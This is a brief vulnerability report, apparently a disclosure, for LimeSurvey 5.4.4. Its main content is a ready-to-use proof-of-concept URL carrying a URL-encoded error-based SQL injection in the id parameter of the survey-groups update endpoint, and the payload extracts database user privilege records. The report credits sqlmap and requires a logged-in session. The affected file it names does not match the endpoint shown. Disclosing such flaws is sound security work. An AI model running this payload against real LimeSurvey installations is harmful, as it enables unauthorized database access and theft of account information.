Vulnerability Description

• Affected product: LimeSurveyCMS V5.4.4
• Attack type: Remote
• Affected component: /application/views/themeOptions/update.php

Recurrence Process

• Login to website background

• poc

<http://XX.XX.XX.XX/index.php?r=admin/surveysgroups/sa/update&id=1%29%20AND%20GTID_SUBSET%28CONCAT%280x717a707071%2C%28SELECT%20MID%28%28IFNULL%28CAST%28grantee%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20INFORMATION_SCHEMA.USER_PRIVILEGES%20LIMIT%2026%2C1%29%2C0x7162707871%29%2C2772%29--%20cDQz>

• sqlmap